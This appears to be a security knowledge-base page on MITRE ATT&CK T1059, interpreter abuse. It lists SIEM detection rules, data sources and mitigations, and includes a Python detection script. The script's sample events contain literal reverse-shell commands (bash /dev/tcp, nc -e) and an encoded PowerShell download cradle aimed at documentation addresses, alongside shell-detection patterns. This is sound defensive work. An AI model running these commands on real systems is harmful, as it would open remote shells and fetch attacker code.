T1059: Command and Scripting Interpreter
Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell.
There are also cross-platform interpreters such as Python, as well as those commonly associated with client applications such as JavaScript and Visual Basic.
Adversaries may abuse these technologies in various ways as a means of executing arbitrary commands. Commands and scripts can be embedded in Initial Access payloads delivered to victims as lure documents or as secondary payloads downloaded from an existing C2. Adversaries may also execute commands through interactive terminals/shells, as well as utilize various Remote Services in order to achieve remote Execution.
Positive Technologies products that cover the technique
MaxPatrol SIEM knowledge base
- pt_application_firewall: PT-CR-1915: PTAF_Hacktool_Detected: PT AF detected signs of a hacking tool being used
- it_bastion: PT-CR-2171: SKDPUNT_Suspicious_Command: A user executed a potentially dangerous command
- it_bastion: PT-CR-2184: SKDPUNT_Blacklisted_Command: A blacklisted command was executed
- it_bastion: PT-CR-2177: SKDPUNT_Potentially_Dangerous_Command: Potentially dangerous commands were used
- mysql_database: PT-CR-613: MySQL_Structure_Discovery: Execution of certain SQL commands may indicate reconnaissance of the internal structure of the MySQL database, which may indicate attacker activity
- mysql_database: PT-CR-617: MySQL_Code_Execution: Running a process under a database account may indicate an attempt by an attacker who has gained the ability to execute database queries to escalate privileges
- mysql_database: PT-CR-2304: MySQL_File_System_Actions: Interaction of the MySQL database with the file system may indicate reconnaissance or an attempt by an attacker to escalate privileges, unless this is the database's standard integration with external systems
- mitre_attck_execution: PT-CR-339: Script_Files_Execution: A user attempted to run a script
- unix_mitre_attck_execution: PT-CR-1678: Unix_File_Creation_By_Script: A file was created using a Python or Ruby script
- unix_mitre_attck_execution: PT-CR-296: Unix_Reverse_Shell: A reverse-shell connection using third-party tools
- unix_mitre_attck_execution: PT-CR-1031: Unix_Inline_Reverse_Or_Bind_Shell: Bind or reverse shell creation is detected based on specific command-line patterns
- unix_mitre_attck_execution: PT-CR-1018: Unix_Hacktool_Usage: The rule detects the use of security analysis tools on Unix hosts
- sap_suspicious_user_activity: PT-CR-254: SAPASABAP_GW_Sapxpg_Call: SAPXPG run
- mitre_attck_cred_access: PT-CR-2124: LSASS_Dump_Via_RPC: A user accessed the LSASS process memory. After connecting the corresponding utility (such as Mimikatz) to the RPC server and gaining access to the LSASS process memory, attackers can save this memory to a separate file and later extract passwords and NTLM hashes from it.
Subtechniques
Detection
| ID | Data source and component | Description |
|---|---|---|
| DS0012 | Script: Script Execution | Any attempt to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system but are enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent. |
| DS0009 | Process: Process Creation | Monitor log files for process execution through command-line and scripting activities. This information can be useful in gaining additional insight into adversaries' actions through how they use native processes or custom tools. Also monitor for loading of modules associated with specific languages. |
| DS0017 | Command: Command Execution | Monitor command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information Discovery, Collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script. Scripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. |
| DS0009 | Process: Process Metadata | Monitor contextual data about a running process, which may include information such as environment variables, image name, user/owner, or other information that may reveal abuse of system features. For example, consider monitoring for Windows Event ID (EID) 400, which shows the version of PowerShell executing in the |
| DS0011 | Module: Module Load | Monitor for events associated with scripting execution, such as the loading of modules associated with scripting languages (ex: JScript.dll or vbscript.dll). |
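The Process Creation, Command Execution and Module Load data sources above, and the MaxPatrol SIEM rules that key on command-line patterns (such as Unix_Inline_Reverse_Or_Bind_Shell), all reduce to the same engineering task: normalise an event, then match the image, parent and command line against a small set of interpreter-abuse patterns. The script below is an added example written for this page, not a Positive Technologies or MITRE artifact; the event shape (Image, ParentImage, CommandLine, ImageLoaded), the pattern set and the sample events are all assumptions constructed for illustration. It decodes PowerShell -EncodedCommand payloads (base64 over UTF-16LE) so the rule can inspect what actually runs, flags Office applications spawning interpreters, catches common inline bind/reverse-shell idioms on Unix, and flags the JScript/VBScript engines being loaded by a process that is not a normal script host.

```python
"""Constructed T1059 detection logic: scores process-creation and module-load events.
Field names follow a Sysmon-like shape (Image, CommandLine, ParentImage, ImageLoaded);
all events below are constructed samples, not real telemetry."""
import base64
import re
from typing import Optional

INTERPRETERS = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "cscript.exe", "wscript.exe", "mshta.exe",
    "bash", "sh", "dash", "zsh", "python", "python3", "perl", "ruby",
}
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_DLLS = {"jscript.dll", "vbscript.dll"}
DLL_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}  # expected hosts for those engines

# Illustrative (assumed) command-line patterns for inline bind/reverse shells on Unix
SHELL_PATTERNS = [
    ("bash_devtcp", re.compile(r"/dev/(?:tcp|udp)/[\w.\-]+/\d+")),          # bash -i >& /dev/tcp/h/p
    ("nc_exec", re.compile(r"\b(?:nc|ncat|netcat)\b.*\s-[a-z]*[ce]\s")),     # nc -e /bin/sh, ncat -c
    ("mkfifo_pipe_shell", re.compile(r"mkfifo\b.*\b(?:nc|ncat|netcat|telnet)\b")),
    ("python_socket_dup2", re.compile(r"socket\.socket\(.*dup2\(")),
    ("socat_exec", re.compile(r"\bsocat\b.*\bexec:", re.I)),
]
# -e / -ec / -enc / -EncodedCommand followed by base64; PowerShell accepts any unambiguous
# prefix of the parameter name, so a few common spellings are listed here.
ENCODED_CMD = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def basename(path: str) -> str:
    """Last path component, lower-cased, for both Windows and Unix paths."""
    return re.split(r"[\\/]", path)[-1].lower()


def decode_encoded_powershell(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload (UTF-16LE inside base64), or None."""
    m = ENCODED_CMD.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(event: dict) -> list:
    """Return the names of the rules that fire for one event, in evaluation order."""
    hits = []
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    cmdline = event.get("CommandLine", "")
    if event.get("EventType") == "ModuleLoad":
        # DS0011: a script engine loaded by something other than a normal script host
        if basename(event.get("ImageLoaded", "")) in SCRIPT_DLLS and image not in DLL_HOSTS:
            hits.append("script_engine_loaded_by_unexpected_host")
        return hits
    # DS0009: parent/child relationship, e.g. a lure document launching an interpreter
    if image in INTERPRETERS and parent in OFFICE_APPS:
        hits.append("office_spawned_interpreter")
    # DS0017: command-line patterns for inline shells
    for name, pat in SHELL_PATTERNS:
        if pat.search(cmdline):
            hits.append(f"inline_shell:{name}")
    decoded = decode_encoded_powershell(cmdline)
    if decoded is not None:
        hits.append("encoded_powershell")
        # The decoded script is what actually executes, so match on it as well
        if re.search(r"(?i)downloadstring|invoke-webrequest|iex\b|invoke-expression", decoded):
            hits.append("encoded_powershell:download_cradle")
    return hits


def _b64_utf16(script: str) -> str:
    """Encode a script the way powershell.exe -EncodedCommand expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


SAMPLE_EVENTS = [  # constructed samples; 192.0.2.0/24 is documentation address space
    {"EventType": "ProcessCreate",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": "powershell.exe -nop -w hidden -enc " + _b64_utf16(
         "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/a.ps1')")},
    {"EventType": "ProcessCreate", "Image": "/bin/bash", "ParentImage": "/usr/sbin/apache2",
     "CommandLine": "bash -c 'bash -i >& /dev/tcp/192.0.2.10/4444 0>&1'"},
    {"EventType": "ProcessCreate", "Image": "/usr/bin/nc", "ParentImage": "/bin/sh",
     "CommandLine": "nc -e /bin/sh 192.0.2.10 4444"},
    {"EventType": "ProcessCreate", "Image": "/usr/bin/python3", "ParentImage": "/usr/bin/bash",
     "CommandLine": "python3 -m http.server 8000"},                       # benign
    {"EventType": "ModuleLoad", "Image": r"C:\Windows\System32\rundll32.exe",
     "ImageLoaded": r"C:\Windows\System32\vbscript.dll"},
    {"EventType": "ProcessCreate", "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "cmd.exe /c dir"},  # benign
]


def run(events=SAMPLE_EVENTS) -> dict:
    """Map each event index to the rules it triggered."""
    return {i: analyze(e) for i, e in enumerate(events)}


if __name__ == "__main__":
    for i, hits in run().items():
        print(i, hits or "-")
```

Two of the six constructed events are benign and produce no hits, which is the point of matching on parent/child relationships and decoded content rather than on the mere presence of an interpreter: cmd.exe and python3 are everywhere on real hosts, so "interpreter started" alone is not a usable signal. Production rules would also need to handle argument obfuscation (caret escapes, string concatenation, -EncodedCommand nested inside another PowerShell invocation) that this example does not attempt.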
Mitigation
| ID | Name | Description |
|---|---|---|
| M1021 | Restrict Web-Based Content | Script-blocking extensions can help prevent the execution of scripts and HTA files that are commonly used during the exploitation process. For malicious code served through ads, ad blockers can help prevent that code from executing in the first place. |
| M1026 | Privileged Account Management | When PowerShell is necessary, consider restricting the PowerShell execution policy to administrators. Be aware that there are methods of bypassing the PowerShell execution policy, depending on environment configuration. PowerShell JEA (Just Enough Administration) may also be used to sandbox administration and limit what commands admins/users can execute through remote PowerShell sessions. |
| M1038 | Execution Prevention | Use application control where appropriate. For example, PowerShell Constrained Language mode can be used to restrict access to sensitive or otherwise dangerous language elements such as those used to execute arbitrary Windows APIs or files (e.g., |
| M1040 | Behavior Prevention on Endpoint | On Windows 10, enable Attack Surface Reduction (ASR) rules to prevent Visual Basic and JavaScript scripts from executing potentially malicious downloaded content. |
| M1042 | Disable or Remove Feature or Program | Disable or remove any unnecessary or unused shells or interpreters. |
| M1045 | Code Signing | Where possible, only permit execution of signed scripts. |
| M1049 | Antivirus/Antimalware | Antivirus can be used to automatically quarantine suspicious files. |